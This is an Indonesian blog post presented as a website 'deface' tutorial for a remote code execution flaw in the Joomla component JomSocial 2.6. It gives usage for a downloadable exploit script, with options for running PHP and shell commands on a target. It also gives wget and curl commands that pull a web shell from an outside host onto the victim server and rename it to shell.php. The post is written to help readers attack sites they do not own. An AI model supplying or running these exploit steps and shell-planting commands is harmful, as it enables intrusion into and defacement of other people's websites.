• JomSocial 2.6 - Remote Code Execution

    Posted by : indoanim Monday, March 31, 2014



    Sudah lama tidak membahas mengenai deface mendeface, kesempatan kali ini admin akan memberikan trik deface yaitu "JomSocial 2.6 - Remote Code Execution" langsung saja silahkan simak tutorial dibawah :

    JomSoc adalah perangkat komponen joomla yang memungkinkan Anda untuk membuat situs jaringan sosial canggih yang populer bebas penggunaannya dan open source software joomla.

    Pada komponen Jomsocial versi 2.6 terdapat bug Rce ( Remote Code Execution ) yang memungkinkan attacker mengeksekusi kode² berbahaya untuk mengeksploitasi web yg memakai komponen ini.

    Bahan sebelum beraksi download bahannya :

    Exploit
    Python 27

    Step- step :

    ♤ Install Python
    ♤ Open cmd
    ♤ Masuk dir dimana exploit berada
    ♤ Jalankan exploit


    Perintah:
    1. exploit.py -u http://127.0.0.1/index.php -opsi

    Macam opsi:
    1. u -> url / web target format : http://situs.com/index.php
    2. p -> mengeksekusi kode php : "echo 'Hello World!';"
    3. s -> mengeksekusi command shell : "netstat -n" dll .
    4. c -> menggunakan pemakaian functions : passthru

    ♤ Cara tanam shell

    trik a:
    1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
    2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"

    trik b:
    1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"

    Demikian artikel yang dapat kami berikan, artikel ini kami ambil dari User Sanjungan Jiwa di forum kami, jika ada kendala atau masalah saat menjalankan tutorial ini silahkan langsung menuju threadnya disini.

    Trimakasih,
    Thanks to : Sanjungan Jiwa

    Author : Bimo Septiawan

    Label : ,

    0 comments

    • Subscribe to: Post Comments (Atom)

    Blogger templates

    Weekly post

    Popular Posts

    Copyright © - Network Tips - Network Tips - Powered by Blogger - Designed by inggisxXx